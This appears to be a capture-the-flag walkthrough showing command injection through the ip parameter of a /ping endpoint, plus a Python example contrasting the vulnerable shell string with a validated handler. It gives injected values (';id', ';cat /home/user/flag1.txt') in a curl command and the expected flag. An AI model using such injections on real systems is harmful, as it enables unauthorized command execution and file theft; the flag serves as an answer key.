
The Iron Shell - TOKEN1

Base URL: http://target:8000

Background

The /ping endpoint shells out to ping using the ip parameter without proper sanitization, enabling command injection.
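
An added example, not the challenge's own code: the vulnerable pattern described above next to a hardened handler. It assumes a Python service; the function names, the ping flags and the status codes are hypothetical, since the page does not show the server source.

```python
import ipaddress
import subprocess


def build_vulnerable_command(ip):
    # The flaw described above: the parameter is pasted into a shell string,
    # so a ';' in ip ends the ping command and starts a second one.
    return f"ping -c 1 {ip}"


def parse_ipv4(ip):
    """Return the canonical dotted-quad address or raise ValueError."""
    # IPv4Address accepts only a literal address: no whitespace, no hostnames,
    # no shell metacharacters. IPv4-only is a choice made for this example.
    return str(ipaddress.IPv4Address(ip))


def build_safe_argv(ip):
    # An argument vector, never a shell string: even an unexpected value
    # would reach ping as one argument and not be interpreted by /bin/sh.
    return ["ping", "-c", "1", parse_ipv4(ip)]


def handle_ping(ip, runner=subprocess.run):
    """Hypothetical /ping handler body: returns (HTTP status, response text)."""
    try:
        argv = build_safe_argv(ip)
    except ValueError:
        return 400, "invalid ip"
    try:
        result = runner(argv, capture_output=True, text=True,
                        timeout=5, shell=False)
    except subprocess.TimeoutExpired:
        return 504, "ping timed out"
    return (200 if result.returncode == 0 else 502), result.stdout


if __name__ == "__main__":
    # Constructed inputs: the two values used in the iterations on this page.
    for value in ("127.0.0.1", "127.0.0.1;id"):
        print(repr(value), "->", handle_ping(value)[0])
```

Validation and the argument vector are independent controls: the first rejects the request with a 400 before any process starts, the second removes the shell so there is nothing for a separator character to act on.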

From Nothing to Working

Start point: the challenge note only says there is an entry point at /ping.

Iterations:

  1. Hit /ping directly to confirm the endpoint exists and responds.
  2. Supply a normal IP value to confirm it performs a ping.
  3. Append ;id to ip= to verify command injection and observe uid=1000(user).
  4. Use the same injection to read the flag file with cat, which returns the token.

Goal

Exploit the /ping command injection to read the flag.

Command

curl -s "http://target:8000/ping?ip=127.0.0.1;cat+/home/user/flag1.txt"

Expected Output

Look for:

PCCC{flag1_CC_7380}

Learn More